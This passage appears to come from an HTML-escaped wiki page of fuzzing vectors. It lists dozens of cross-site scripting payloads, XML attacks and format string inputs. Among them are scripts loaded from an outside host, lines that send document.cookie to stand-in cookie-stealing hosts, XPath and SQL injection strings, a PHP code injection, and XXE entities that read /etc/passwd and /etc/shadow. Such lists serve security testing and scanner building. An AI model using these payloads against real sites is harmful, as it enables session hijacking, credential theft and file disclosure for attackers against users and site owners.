&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
